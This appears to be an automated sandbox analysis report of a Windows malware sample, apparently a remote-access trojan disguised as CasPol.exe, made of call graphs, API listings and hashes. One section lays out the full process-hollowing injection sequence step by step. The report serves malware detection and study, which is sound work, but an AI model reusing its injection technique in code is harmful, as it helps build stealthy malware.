__dosmaperr 51691->51698 51693 446afb GetLastError 51693->51694 51694->51685 51695->51685 51696->51685 51697->51687 51698->51693 51699 402bcc 51700 402bd7 51699->51700 51701 402bdf 51699->51701 51707 403315 51700->51707 51703 402beb 51701->51703 51714 4015d3 51701->51714 51708 4015d3 22 API calls 51707->51708 51709 40332a 51708->51709 51710 402bdd 51709->51710 51711 40333b 51709->51711 51724 43a864 11 API calls _abort 51711->51724 51713 43a863 51716 43361d 51714->51716 51715 43a89c ___crtLCMapStringA 21 API calls 51715->51716 51716->51715 51717 402be9 51716->51717 51720 43363e std::_Facet_Register 51716->51720 51725 442210 7 API calls 2 library calls 51716->51725 51719 433dfc std::_Facet_Register 51727 437be7 RaiseException 51719->51727 51720->51719 51726 437be7 RaiseException 51720->51726 51723 433e19 51724->51713 51725->51716 51726->51719 51727->51723 51728 4339ce 51729 4339da __FrameHandler3::FrameUnwindToState 51728->51729 51760 4336c3 51729->51760 51731 4339e1 51732 433b34 51731->51732 51735 433a0b 51731->51735 52060 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 51732->52060 51734 433b3b 52061 4426ce 28 API calls _abort 51734->52061 51745 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 51735->51745 52054 4434e1 5 API calls _ValidateLocalCookies 51735->52054 51737 433b41 52062 442680 28 API calls _abort 51737->52062 51740 433b49 51741 433a24 51742 433a2a 51741->51742 52055 443485 5 API calls _ValidateLocalCookies 51741->52055 51744 433aab 51771 433c6e 51744->51771 51745->51744 52056 43ee04 35 API calls 3 library calls 51745->52056 51754 433acd 51754->51734 51755 433ad1 51754->51755 51756 433ada 51755->51756 52058 442671 28 API calls _abort 51755->52058 52059 433852 13 API calls 2 library calls 51756->52059 51759 433ae2 51759->51742 51761 4336cc 51760->51761 52063 433e1a IsProcessorFeaturePresent 51761->52063 51763 4336d8 52064 4379fe 10 API calls 3 library 
calls 51763->52064 51765 4336e1 51765->51731 51766 4336dd 51766->51765 52065 44336e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 51766->52065 51768 4336ea 51769 4336f8 51768->51769 52066 437a27 8 API calls 3 library calls 51768->52066 51769->51731 52067 436060 51771->52067 51774 433ab1 51775 443432 51774->51775 52069 44ddd9 51775->52069 51777 44343b 51779 433aba 51777->51779 52073 44e0e3 35 API calls 51777->52073 51780 40d767 51779->51780 52075 41bcf3 LoadLibraryA GetProcAddress 51780->52075 51782 40d783 GetModuleFileNameW 52080 40e168 51782->52080 51784 40d79f 51785 401fbd 28 API calls 51784->51785 51786 40d7ae 51785->51786 51787 401fbd 28 API calls 51786->51787 51788 40d7bd 51787->51788 52095 41afd3 51788->52095 51792 40d7cf 51793 401d8c 11 API calls 51792->51793 51794 40d7d8 51793->51794 51795 40d835 51794->51795 51796 40d7eb 51794->51796 52120 401d64 51795->52120 52364 40e986 90 API calls 51796->52364 51799 40d845 51802 401d64 28 API calls 51799->51802 51800 40d7fd 51801 401d64 28 API calls 51800->51801 51804 40d809 51801->51804 51803 40d864 51802->51803 52125 404cbf 51803->52125 52365 40e937 65 API calls 51804->52365 51806 40d873 52129 405ce6 51806->52129 51809 40d87f 52132 401eef 51809->52132 51810 40d824 52366 40e155 65 API calls 51810->52366 51813 40d88b 51814 401eea 11 API calls 51813->51814 51815 40d894 51814->51815 51817 401eea 11 API calls 51815->51817 51816 401eea 11 API calls 51818 40dc9f 51816->51818 51819 40d89d 51817->51819 52057 433ca4 GetModuleHandleW 51818->52057 51820 401d64 28 API calls 51819->51820 51821 40d8a6 51820->51821 52136 401ebd 51821->52136 51823 40d8b1 51824 401d64 28 API calls 51823->51824 51825 40d8ca 51824->51825 51826 401d64 28 API calls 51825->51826 51828 40d8e5 51826->51828 51827 40d946 51829 401d64 28 API calls 51827->51829 51844 40e134 51827->51844 51828->51827 52367 4085b4 51828->52367 51835 40d95d 51829->51835 51831 40d912 51832 401eef 11 API calls 
51831->51832 51833 40d91e 51832->51833 51836 401eea 11 API calls 51833->51836 51834 40d9a4 52140 40bed7 51834->52140 51835->51834 51841 4124b7 3 API calls 51835->51841 51838 40d927 51836->51838 52371 4124b7 RegOpenKeyExA 51838->52371 51839 40d9aa 51840 40d82d 51839->51840 52143 41a473 51839->52143 51840->51816 51846 40d988 51841->51846 52459 412902 30 API calls 51844->52459 51845 40d9c5 51847 40da18 51845->51847 52160 40697b 51845->52160 51846->51834 52374 412902 30 API calls 51846->52374 51850 401d64 28 API calls 51847->51850 51853 40da21 51850->51853 51852 40e14a 52460 4112b5 64 API calls ___scrt_fastfail 51852->52460 51861 40da32 51853->51861 51862 40da2d 51853->51862 51855 40d9e4 52375 40699d 30 API calls 51855->52375 51856 40d9ee 51860 401d64 28 API calls 51856->51860 51869 40d9f7 51860->51869 51866 401d64 28 API calls 51861->51866 52378 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 51862->52378 51863 40d9e9 52376 4064d0 97 API calls 51863->52376 51867 40da3b 51866->51867 52164 41ae18 51867->52164 51869->51847 51872 40da13 51869->51872 51870 40da46 52168 401e18 51870->52168 52377 4064d0 97 API calls 51872->52377 51873 40da51 52172 401e13 51873->52172 51876 40da5a 51877 401d64 28 API calls 51876->51877 51878 40da63 51877->51878 51879 401d64 28 API calls 51878->51879 51880 40da7d 51879->51880 51881 401d64 28 API calls 51880->51881 51882 40da97 51881->51882 51883 401d64 28 API calls 51882->51883 51885 40dab0 51883->51885 51884 40db1d 51886 40db2c 51884->51886 51893 40dcaa ___scrt_fastfail 51884->51893 51885->51884 51887 401d64 28 API calls 51885->51887 51888 40db35 51886->51888 51916 40dbb1 ___scrt_fastfail 51886->51916 51891 40dac5 _wcslen 51887->51891 51889 401d64 28 API calls 51888->51889 51890 40db3e 51889->51890 51892 401d64 28 API calls 51890->51892 51891->51884 51894 401d64 28 API calls 51891->51894 51895 40db50 51892->51895 52438 41265d RegOpenKeyExA 51893->52438 51896 40dae0 51894->51896 51898 401d64 28 API calls 51895->51898 51899 
[Execution graph data, flattened out of the report's interactive call-graph viewer; the graph image itself is not recoverable. Nodes are function addresses in the analysed image (0x401602 to 0x447611) and in a second module whose functions lie at 0x10001000 to 0x10002c40; edges are written as caller->callee, each node carrying its transitive API call count. Windows APIs named on these nodes: RegCreateKeyA, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegQueryValueExW, RegDeleteValueW, RegCloseKey, CreateThread, CreateMutexA, GetLastError, SetProcessDEPPolicy, StrToIntA, GetComputerNameExW, GetUserNameW, GetLocalTime, DeleteFileW, Sleep, GetStartupInfoW, GetModuleHandleA, LoadLibraryA, GetProcAddress, FindResourceA, LoadResource, LockResource, SizeofResource, GetCurrentProcess, IsWow64Process, GetLongPathNameW, GetModuleFileNameW, WSAStartup, getaddrinfo, WSASetLastError, WSAGetLastError, socket, connect, recv, closesocket, CreateEventA, CreateEventW, SetEvent, WaitForSingleObject, CloseHandle, GetLastInputInfo, GetTickCount, GetForegroundWindow, GetWindowTextW, GlobalMemoryStatusEx, GetLocaleInfoA, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, SetLastError, GetNativeSystemInfo, VirtualAlloc, VirtualFree, VirtualProtect, GetProcessHeap, HeapAlloc, HeapFree, GetEnvironmentVariableW, lstrlenW, lstrcatW, FindFirstFileW, FindNextFileW, FindClose, plus CRT-internal helpers (_wcslen, _swprintf, ___scrt_fastfail, __cftof, __dosmaperr, ___crtLCMapStringA, __EH_prolog, _Deallocate, __alldvrm, __Toupper, _free, ___std_exception_copy, ___scrt_initialize_default_local_stdio_options).]
53235 414c97 53234->53235 53279 40275c 28 API calls 53235->53279 53237 414ca6 53238 4027cb 28 API calls 53237->53238 53239 414cb5 53238->53239 53280 40275c 28 API calls 53239->53280 53241 414cc4 53242 4027cb 28 API calls 53241->53242 53243 414cd0 53242->53243 53281 40275c 28 API calls 53243->53281 53245 414cda 53246 404468 61 API calls 53245->53246 53247 414ce9 53246->53247 53248 401eea 11 API calls 53247->53248 53249 414cf2 53248->53249 53250 401eea 11 API calls 53249->53250 53251 414cfe 53250->53251 53252 401eea 11 API calls 53251->53252 53253 414d0a 53252->53253 53254 401eea 11 API calls 53253->53254 53255 414d16 53254->53255 53256 401eea 11 API calls 53255->53256 53257 414d22 53256->53257 53258 401eea 11 API calls 53257->53258 53259 414d2e 53258->53259 53260 401e13 11 API calls 53259->53260 53261 414d3a 53260->53261 53262 401eea 11 API calls 53261->53262 53263 414d43 53262->53263 53264 401eea 11 API calls 53263->53264 53265 414d4c 53264->53265 53266 401d64 28 API calls 53265->53266 53267 414d57 53266->53267 53268 43a5f7 39 API calls 53267->53268 53269 414d64 53268->53269 53270 414d69 53269->53270 53271 414d8f 53269->53271 53274 414d82 53270->53274 53275 414d77 53270->53275 53272 401d64 28 API calls 53271->53272 53272->53273 53273->53211 53273->53215 53277 404915 104 API calls 53274->53277 53282 4049ba 81 API calls 53275->53282 53277->53211 53278->53224 53279->53237 53280->53241 53281->53245 53282->53221 53283->53221 53284->52814 53285->52819 53286->52821 53289 40cc3f 53288->53289 53290 403b9e 28 API calls 53289->53290 53291 40ca3a 53290->53291 53292 402860 53291->53292 53294 40286f 53292->53294 53293 4028b1 53301 402daf 53293->53301 53294->53293 53297 4028a6 53294->53297 53296 4028af 53296->52407 53300 402d68 28 API calls 53297->53300 53299->52387 53300->53296 53302 402dbb 53301->53302 53303 4030f7 28 API calls 53302->53303 53304 402dcd 53303->53304 53304->53296 53306 40e56a 53305->53306 53307 4124b7 3 API calls 53306->53307 53308 40e60e 53306->53308 53311 
40e5fe Sleep 53306->53311 53327 40e59c 53306->53327 53307->53306 53310 4082dc 28 API calls 53308->53310 53309 4082dc 28 API calls 53309->53327 53313 40e619 53310->53313 53311->53306 53312 41ae18 28 API calls 53312->53327 53315 41ae18 28 API calls 53313->53315 53316 40e625 53315->53316 53340 412774 14 API calls 53316->53340 53319 401e13 11 API calls 53319->53327 53320 40e638 53321 401e13 11 API calls 53320->53321 53323 40e644 53321->53323 53322 401f66 28 API calls 53322->53327 53324 401f66 28 API calls 53323->53324 53325 40e655 53324->53325 53328 4126d2 14 API calls 53325->53328 53326 4126d2 14 API calls 53326->53327 53327->53309 53327->53311 53327->53312 53327->53319 53327->53322 53327->53326 53338 40bf04 73 API calls ___scrt_fastfail 53327->53338 53339 412774 14 API calls 53327->53339 53329 40e668 53328->53329 53341 411699 TerminateProcess WaitForSingleObject 53329->53341 53331 40e670 ExitProcess 53342 411637 62 API calls 53336->53342 53339->53327 53340->53320 53341->53331 53343 41569e 53344 401d64 28 API calls 53343->53344 53345 4156b3 53344->53345 53346 401fbd 28 API calls 53345->53346 53347 4156bb 53346->53347 53348 401d64 28 API calls 53347->53348 53349 4156cb 53348->53349 53350 401fbd 28 API calls 53349->53350 53351 4156d3 53350->53351 53354 411aed 53351->53354 53355 4041f1 3 API calls 53354->53355 53356 411b01 53355->53356 53357 40428c 97 API calls 53356->53357 53358 411b09 53357->53358 53359 4027ec 28 API calls 53358->53359 53360 411b22 53359->53360 53361 4027cb 28 API calls 53360->53361 53362 411b2c 53361->53362 53363 404468 61 API calls 53362->53363 53364 411b36 53363->53364 53365 401eea 11 API calls 53364->53365 53366 411b3e 53365->53366 53367 4045d5 261 API calls 53366->53367 53368 411b4c 53367->53368 53369 401eea 11 API calls 53368->53369 53370 411b54 53369->53370 53371 401eea 11 API calls 53370->53371 53372 411b5c 53371->53372

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
• GetProcAddress.KERNEL32(00000000), ref: 0041BD11
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
• GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD40
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
• GetProcAddress.KERNEL32(00000000), ref: 0041BD54
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
• GetProcAddress.KERNEL32(00000000), ref: 0041BD98
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
• GetProcAddress.KERNEL32(00000000), ref: 0041BE08
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
• GetProcAddress.KERNEL32(00000000), ref: 0041BE29
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
• GetProcAddress.KERNEL32(00000000), ref: 0041BE73
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
• Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

Control-flow Graph

control_flow_graph
447 417245-417262
448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448
449 4175cd 448->449
450 4172df-4172e6 448->450
452 4175cf-4175d9 449->452
450->449
451 4172ec-4172f3 450->451
451->449
453 4172f9-4172fb 451->453
453->449
454 417301-41732d call 436060 * 2 453->454
454->449
459 417333-41733e 454->459
459->449
460 417344-417374 CreateProcessW 459->460
461 4175c7 GetLastError 460->461
462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462
461->449
463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463
464 4173a8-4173c8 ReadProcessMemory 462->464
463->449
464->463
465 4173ce-4173ee NtCreateSection 464->465
465->463
466 4173f4-417401 465->466
467 417403-41740e NtUnmapViewOfSection 466->467
468 417414-417436 NtMapViewOfSection 466->468
467->468
469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469
470 417438-417466 VirtualFree NtClose TerminateProcess 468->470
472 417591 469->472
473 4174a4-4174a6 469->473
470->449
471 41746c-417472 470->471
471->448
472->463
474 4174a8-4174ac 473->474
475 4174af-4174d6 call 435ae0 473->475
478 417516-417520 475->478
479 4174d8-4174e2 475->479
481 417522-417528 478->481
482 41753e-417542 478->482
480 4174e6-417509 call 435ae0 479->480
493 41750b-417512 480->493
481->482
486 41752a-41753b call 417651 481->486
483 417544-417560 WriteProcessMemory 482->483
484 417566-41757d Wow64SetThreadContext 482->484
483->463
488 417562 483->488
484->463
489 41757f-41758b ResumeThread 484->489
486->482
488->484
489->463
492 41758d-41758f 489->492
492->452
493->478
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
• NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
• NtClose.NTDLL(?), ref: 0041744A
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
• GetCurrentProcess.KERNEL32(?), ref: 004175A5
• NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
• NtClose.NTDLL(?), ref: 004175B6
• TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
• GetLastError.KERNEL32 ref: 004175C7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
• API String ID: 3150337530-3035715614
• Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
• Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
• Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
• Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A

Control-flow Graph

                                                                                                                  control_flow_graph 1484 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1491 10001177-1000119e lstrlenW FindFirstFileW 1484->1491 1492 10001168-10001172 lstrlenW 1484->1492 1493 100011a0-100011a8 1491->1493 1494 100011e1-100011e9 1491->1494 1492->1491 1495 100011c7-100011d8 FindNextFileW 1493->1495 1496 100011aa-100011c4 call 10001000 1493->1496 1495->1493 1498 100011da-100011db FindClose 1495->1498 1496->1495 1498->1494
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1083526818-0
                                                                                                                  • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                  • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                  • API String ID: 2281282204-3981147832
                                                                                                                  • Opcode ID: 8b57bce22a9f6d76fda62625c2c9eda57b428cac8fd47ef44d4eceb6ac03292f
                                                                                                                  • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                  • Opcode Fuzzy Hash: 8b57bce22a9f6d76fda62625c2c9eda57b428cac8fd47ef44d4eceb6ac03292f
                                                                                                                  • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3525466593-0
                                                                                                                  • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                  • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                  • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                  • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                  Strings
                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                                  • Opcode ID: 1ad6a2ad94e4569e09952a4ded336d3c2f1fb57938f862c7e125ba59f66ea787
                                                                                                                  • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                                  • Opcode Fuzzy Hash: 1ad6a2ad94e4569e09952a4ded336d3c2f1fb57938f862c7e125ba59f66ea787
